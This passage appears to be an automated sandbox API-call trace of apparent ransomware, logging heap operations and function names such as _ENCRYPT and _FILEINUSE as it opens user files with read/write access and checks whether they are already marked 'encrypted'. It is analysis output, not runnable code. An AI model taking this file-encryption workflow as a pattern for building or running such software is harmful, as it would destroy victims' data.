hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0041.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.671] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca00 [0041.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ca00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.671] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0041.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0041.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.671] CloseHandle (hObject=0x128) returned 1 [0041.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.672] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.672] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.673] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.673] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.673] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.673] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.673] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.673] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.673] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.673] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0041.673] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.673] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0041.674] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.674] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.674] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.674] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.674] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.674] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.674] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.674] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.674] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.674] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.674] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.674] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.674] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.675] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.675] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.675] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.675] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.675] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.675] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.675] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.675] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.675] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.675] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.675] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.675] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.675] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.675] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0041.676] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.676] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0041.676] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.676] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.676] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.676] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.676] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.676] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.676] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.676] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.676] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.676] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.676] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.677] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0041.677] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.677] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.677] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0041.677] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.677] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.677] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.677] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.677] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.677] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.678] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.678] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0041.678] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.678] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.678] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0041.678] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.678] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.678] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.678] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.678] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.678] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.678] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.678] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2hbnq.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.679] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.679] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.679] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.679] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.679] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.679] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.679] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.679] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.679] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.679] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.679] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.679] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b24390, ftCreationTime.dwHighDateTime=0x1d5b968, ftLastAccessTime.dwLowDateTime=0x8e9c0710, ftLastAccessTime.dwHighDateTime=0x1d5c585, ftLastWriteTime.dwLowDateTime=0x8e9c0710, ftLastWriteTime.dwHighDateTime=0x1d5c585, nFileSizeHigh=0x0, nFileSizeLow=0x14221, dwReserved0=0x0, dwReserved1=0x777648, cFileName="2hbnq.avi", cAlternateFileName="")) returned 0x7c20c0 [0041.680] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b24390, ftCreationTime.dwHighDateTime=0x1d5b968, ftLastAccessTime.dwLowDateTime=0x8e9c0710, ftLastAccessTime.dwHighDateTime=0x1d5c585, ftLastWriteTime.dwLowDateTime=0x8e9c0710, ftLastWriteTime.dwHighDateTime=0x1d5c585, nFileSizeHigh=0x0, nFileSizeLow=0x14221, dwReserved0=0x0, dwReserved1=0x777648, cFileName="2hbnq.avi", cAlternateFileName="")) returned 0x7c20c0 [0041.680] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.680] 